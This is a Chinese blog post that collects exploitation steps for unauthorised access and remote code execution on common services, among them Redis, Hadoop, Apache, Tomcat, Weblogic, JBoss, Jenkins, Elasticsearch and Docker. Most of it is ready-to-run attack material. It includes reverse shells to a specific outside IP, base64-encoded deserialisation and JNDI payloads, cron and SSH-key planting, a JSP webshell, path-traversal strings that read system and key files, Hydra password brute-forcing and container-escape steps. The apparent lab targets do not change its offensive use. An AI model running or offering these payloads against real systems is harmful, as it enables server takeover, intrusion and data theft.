常见服务安全收集

常见服务安全收集

老婆镇楼(夹带私货)QQ图片20220502201004

#Mysql-未授权访问-CVE-2012-2122利用

受影响版本:

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 5.5.23 are not.

for i in seq 1 1000; do mysql -uroot -pwrong -h your-ip -P3306 ; done

找不到实例

#Hadoop-未授权访问-内置配合命令执行RCE

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

参考链接:https://www.cnblogs.com/cute-puli/p/14944637.html

#Redis-未授权访问-Webshell&任务&密匙&RCE等

1、写Webshell 需得到Web路径

利用条件:Web目录权限可读写

config set dir /tmp            #设置WEB写入目录

config set dbfilename 1.php    #设置写入文件名

set test "<?php phpinfo();?>"  #设置写入文件代码

bgsave                         #保存执行

save                           #保存执行

注意:部分没目录权限读写权限

2、写定时任务反弹shell

利用条件:

允许异地登录

安全模式protected-mode处于关闭状态

config set dir /var/spool/cron

set yy "\n\n\n* * * * * bash -i >& /dev/tcp/47.94.236.117/5555 0>&1\n\n\n"

config set dbfilename x

save

注意:

centos会忽略乱码去执行格式正确的任务计划

而ubuntu并不会忽略这些乱码,所以导致命令执行失败

3、写入Linux ssh-key公钥

利用条件:

允许异地登录

Redis服务使用ROOT账号启动

安全模式protected-mode处于关闭状态

允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

ssh-keygen -t rsa

cd /root/.ssh/

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

cat key.txt | redis-cli -h 118.31.57.214 -x set xxx

config set dir /root/.ssh/

config set dbfilename authorized_keys

save

cd /root/.ssh/

ssh -i id_rsa root@118.31.57.214

4、RCE自动化利用脚本-vulfocus

https://github.com/vulhub/redis-rogue-getshell

python redis-master.py -r 123.58.236.76 -p 11820 -L 47.94.236.117 -P 8888 -f RedisModulesSDK/exp.so -c "id"

5.新漏洞-沙箱绕过RCE CVE-2022-0543-vulfocus

Poc:执行id命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

#Influxdb-未授权访问-Jwt验证不当

默认端口:8086 8088

influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。

1、借助https://jwt.io/来生成jwt token:

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "username": "admin",
  "exp": 1676346267
}

2、发送数据包触发未授权

POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show users

#H2database-未授权访问-配置不当

默认端口:20051

H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:默认端口:

spring.h2.console.enabled=true 
spring.h2.console.settings.web-allow-others=true

利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。

1、下载JNDI-Injection-Exploit

https://github.com/welk1n/JNDI-Injection-Exploit

2、生成执行RMI Payload-URL

-C 执行命令 -A 服务器地址

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 47.94.236.117

3、填入URL提交执行

javax.naming.InitialContext
rmi://47.94.236.117:1099/kd1rns

#CouchDB-权限绕过配合RCE-漏洞

默认端口:5984

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)

-CouchDB-权限绕过-CVE-2017-12635

版本小于1.7.0以及小于2.1.1

1、先创建用户

PUT:/_users/org.couchdb.user:vulhub
{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

2、登录用户授权

Get:/_utils/
vulhub vulhub

fofa语法 server="CouchDB/2.1.0" && port="5984"

-CouchDB-权限绕过RCE-CVE-2017-12636

1、下载exp.py

2、修改目标和反弹地址

3、Python3调用执行即可

https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

#ElasticSearch-文件写入&RCE-漏洞

默认端口:9200 9300

-Elasticsearch RCE CVE-2014-3120

1、漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "xiaodi"
}

2、直接发包触发执行命令

-Elasticsearch 文件写入 wooyun_2015_110216

9200一般为ElasticSearch的常用端口,此漏洞环境需要与中间件使用

1、发现9200端口存在elasticsearch页面,8080存在tomcat目录

2、利用ElasticSearch写入后门到/usr/local/tomcat/webapps/wwwroot/

curl -XPOST http://123.58.236.76:31556/yz.jsp/yz.jsp/1 -d

{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'

curl -XPUT 'http://123.58.236.76:31556/_snapshot/yz.jsp' -d '{

    "type": "fs",

    "settings": {

         "location": "/usr/local/tomcat/webapps/wwwroot/",

         "compress": false

     }

}'



curl -XPUT "http://123.58.236.76:31556/_snapshot/yz.jsp/yz.jsp" -d '{

    "indices": "yz.jsp",

    "ignore_unavailable": "true",

    "include_global_state": false

}'

3、访问8080端口snapshot-yz.jsp文件写入代码到test.jsp中

http://123.58.236.76:31557/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success
http://123.58.236.76:31557/wwwroot/test.jsp

#口令猜解-Hydra-FTP&RDP&SSH

https://github.com/vanhauser-thc/thc-hydra

hydra是一个自动化的爆破工具,暴力破解弱密码,

是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户,对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写,指定密码破解,少用,一般是采用密码字典。

-P FILE 大写,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数,默认为16。

-w TIME 设置最大超时的时间,单位秒,默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

例子:

FTP:文件传输协议

RDP:Windows远程桌面协议

SSH:Linux安全外壳协议

hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V

hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V

hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V

#配置不当-未授权访问-Rsync文件备份

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

判断:rsync rsync://123.58.236.76:45854/

利用:

-读取文件:rsync rsync://123.58.236.76:45854/src/

-下载文件:rsync rsync://123.58.236.76:45854/src/etc/passwd ./

-上传文件:rsync -av passwd rsync://123.58.236.76:45854/src/tmp/passwd

反弹shell:

1、获取信息:

rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt

2.创建文件

touch shell 

#!/bin/bash 

/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

chmod +x shell

3、上传文件

rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly

4、等待接受反弹

#直接搜哈-MSF&Fofaviewer

https://github.com/wgpsec/fofa_viewer

msfconsole

use auxiliary/scanner/rsync/modules_list

set rhosts file:/root/ips.txt

set threads 10

run

#协议漏洞-应用软件-FTP&Proftpd搭建

https://github.com/t0kx/exploit-CVE-2015-3306

python exploit.py --host 123.58.236.76 --port 24967 --path "/var/www/html/"

http://123.58.236.76:19758/backdoor.php?cmd=id

#协议漏洞-应用软件-SSH&libssh&Openssh

-Openssh CVE-2014-0160 CVE-2018-15473 cve_2020_15778

CVE-2014-0160 版本很少

cve_2020_15778 价值不高

CVE-2018-15473-用户名枚举

https://github.com/Rhynorater/CVE-2018-15473-Exploit

pip3 install -r requirements.txt

pip3 install paramiko==2.4.1

python sshUsernameEnumExploit.py --port 32013 --userList exampleInput.txt 123.58.236.76

-libssh 身份验证绕过(CVE-2018-10933)

https://www.seebug.org/vuldb/ssvid-97614

python libssh.py 123.58.236.76 55190 "id"

#远程控制-向日葵&Vnc&Teamviewer

-向日葵 RCE

https://github.com/Mr-xn/sunlogin_rce

xrkRce.exe -h 192.168.46.157 -t scan

xrkRce.exe -h 192.168.46.157 -t rce -p 49712 -c "ipconfig"

-Teamviewer

<!DOCTYPE html>
<html>
<head>
<title>cve-2020-13699</title>
</head>
<body>
    <p>Welcome to xiaodi!</p>
    <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>

-VNC 口令问题&未授权

MSF内置口令及未授权测试

#设备平台-Zabbix-CVE-2022-23131

Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。默认端口:10051

Zabbix CVE-2022-23131 登录绕过漏洞复现

https://github.com/L0ading-x/cve-2022-23131

python3 zabbix.py target Admin

然后修改Cookie,使用saml登录即可

CVE-2017-2824 CVE-2020-11800

image-20220426161555652

#设备平台-Kibana-CVE-2019-7609

Kibana为Elassticsearch设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞,利用漏洞可以在目标服务器上执行任意代码。默认端口:5601

https://github.com/LandGrey/CVE-2019-7609

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

#中间件-IIS-短文件&解析&蓝屏等

1、短文件:信息收集

2、文件解析:还有点用

3、HTTP.SYS:蓝屏崩溃

4、CVE-2017-7269 条件过老

#中间件-Nginx-文件解析&命令执行等

1、后缀解析 文件名解析

配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

CVE-2013-4547:影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

2、cve_2021_23017 无EXP

3、cve_2017_7529 意义不大

#中间件-Apache-RCE&目录遍历&文件解析等

Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

1、cve_2021_42013 RCE

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2、cve_2021_41773 目录穿越

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

Burp:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

3、cve-2017-15715 文件解析

Apache HTTPD是一款HTTP服务器。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

4、cve_2017_9798 价值不高

5、cve_2018_11759 价值不高

6、cve_2021_37580 插件问题

#中间件-Tomcat-弱口令&文件上传&文件包含等

1、弱口令猜解

https://github.com/BeichenDream/Godzilla

配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell

2、CVE-2017-12615 文件上传

当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。

影响版本:Apache Tomcat 7.0.0 - 7.0.79

PUT /1.jsp/ HTTP/1.1

shell代码

3、cve_2020_1938 文件包含

Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

漏洞影响的产品版本包括:

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

D:\Python27\python.exe CNVD-2020-10487-Tomcat-Ajp-lfi.py 123.58.236.76 -p 63667 -f WEB-INF/web.xml

4、cve_2020_11996 拒绝服务

危害过大,权限无关,意义不大

5、cve_2020_9484 反序列化

利用条件太苛刻,意义不大

#中间件-Fofaviewer&Apache_RCE

server="Apache/2.4.49"

#中间件-Weblogic-工具搜哈

探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器

cve_2017_3506 工具

cve_2018_2893 工具

cve_2018_3245 工具

cve_2020_14882 工具

cve_2021_2394 反序列化

https://github.com/lz2y/CVE-2021-2394

https://github.com/welk1n/JNDI-Injection-Exploit

vps生成ldap 监听端口

编码:bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

执行:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.94.236.117

发送数据触发

java -jar CVE_2021_2394.jar 123.58.236.76 32185 ldap://47.94.236.117:1389/x1nfdy

#中间件-JBoos-工具脚本搜哈

Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

1、CVE-2017-12149

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser

curl http://47.94.236.117:8080/invoker/readonly --data-binary @poc.ser

2、CVE-2017-7504

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" > 1.ser

curl http://47.94.236.117:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser

3、弱口令 未授权访问见手册

#中间件-Jenkins-工具脚本搜哈

探针默认端口:8080,Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。

1、cve_2017_1000353 JDK-1.8.0_291 其他版本失效

http://github.com/vulhub/CVE-2017-1000353

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

python exploit.py http://123.58.236.76:54217 jenkins_poc.ser

2、CVE-2018-1000861

https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

python3 -m http.server 8888

python2 exp.py http://123.58.236.76:52281/ "curl -o /tmp/1.sh http://47.94.236.117:8888/shell.txt"

python2 exp.py http://123.58.236.76:52281/ "bash /tmp/1.sh"

3、cve_2019_100300 需要用户帐号密码

#中间件-GlassFish-工具脚本搜哈

探针默认端口:4848,GlassFish 是一款强健的商业兼容应用服务器

1、CVE-2017-1000028

读密码:

/theme/META-INF/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./domains/domain1/config/admin-keyfile

读windows文件:/theme/META-

INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

读linux文件:/theme/META-

INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

2、简单口令

#配合下-Fofa_Viewer-工具脚本搜哈

1、配合GlassFish读取测试

2、配合Jenkins-CVE-2018-1000861

#中间件-K8s-搜哈

kubernetes简称 k8s,是一个由google开源的,用于自动部署,扩展和管理容器化应用程序的开源系统。在B站内部,k8s在管理生产级容器和应用服务部署已经有较为广泛和成熟的应用。通过k8s,可跨多台主机进行容器编排、快速按需扩展容器化应用及其资源、对应用实施状况检查、服务发现和负载均衡等。

https://blog.csdn.net/w1590191166/article/details/122028001

#中间件-Jetty-搜哈

Elipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。

CVE-2021-28164

http://123.58.236.76:63126/./WEB-INF/web.xml

CVE-2021-28169

http://123.58.236.76:63126/static?/WEB-INF/web.xml

CVE-2021-34429

http://123.58.236.76:63126/%u002e/WEB-INF/web.xml

#中间件-Docker-搜哈

Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。 它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞。

1、容器判断:

-是否存在.dockerenv文件

ls -alh /.dockerenv

-查询系统进程的cgroup信息:

cat /proc/1/cgroup

2、容器逃逸漏洞:权限提升

-由内核漏洞引起 ——Dirty COW(CVE-2016-5195)

-由 Docker 软件设计引起——CVE-2019-5736、CVE-2019-14271,CVE-2020-15257

-由配置不当引起——开启privileged(特权模式)+宿主机目录挂载(文件挂载)、功能(capabilities)机制、sock通信方式

-CVE-2016-5195

https://github.com/gebl/dirtycow-docker-vdso

https://www.ichunqiu.com/experiment/catalog?id=100295

# 使用本地1234端口连接docker的1234端口运行dirtycow镜像,并将其临时命名为test

# 其中 test:为临时名称,可以自定义填写。 -p: 第一个端口为本机的端口,第二个端口为Docker的端口。 -itd:意思是在后台运行,交互式运行,并且输出当前的信息 /bin/bash:调用Shell

docker run --name=test -p 1234:1234 -itd dirtycow /bin/bash

# 进入镜像内部

docker exec -it test /bin/bash

# 编译并运行POC

cd /dirtycow-vdso/

make

./0xdeadbeef

-CVE-2019-5736

参考:https://blog.51cto.com/u_15060465/4336524

复现:curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh

1、下载POC

git clone https://github.com/Frichetten/CVE-2019-5736-PoC

2、修改编译生成payload

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

3.将该payload拷贝到docker容器中(此时可以模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸) 并执行

docker cp main ecca872da49d:/home

docker exec -it ecca872da49d bash

cd /home/

chmod 777 main

./main

4、再次进入docker镜像后监听即可收到

docker exec -it 镜像ID bash

nc -lvvp

3、容器安全漏洞

docker未授权访问漏洞-vulhub-exp.py

import docker

client = docker.DockerClient(base_url='http://目标IP:2375/')

data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 反弹IP 端口 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

#中间件-WebSphere-搜哈

WebSphere® Application Server 加速交付新应用程序和服务,它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验从基于开放标准的丰 富的编程模型中进行选择,以便更好地协调项目需求与编程模型功能和开发人员技能。

端口:9080—web(http)应用访问端口、9443—web(https)应用访问端口、9060—管理后台访问端口、9043—管理控制台安全端口、8880—SOAP连接器端口等等。

漏洞探测在8880端口,后台是9060端口,解析是9080端口

拉取镜像:docker pull iscrosales/websphere7

启动镜像:docker run -d -p 9060:9060 -p 9043:9043 -p 8880:8880 -p 9080:9080 iscrosales/websphere7

停止镜像:docker stop $(docker ps -aq)

1、CVE-2015-7450 反序列化

工具搜哈:http://47.94.236.117:8880/

2、弱口令 上传拿Shell

-在6.x至7.0版本,后台登陆只需要输入admin作为用户标识,无需密码,即可登陆后台。

-websphere/ websphere

-system/ manager

访问:http://47.94.236.117:9060/

登录:admin

上传:war马

启动:1_war

连接:http://47.94.236.117:9080/1/1.jsp

3、CVE-2020-4450:无利用POC/EXP

posted @ 2022-05-18 08:17  甘雨小可爱!  阅读(976)  评论(0)    收藏  举报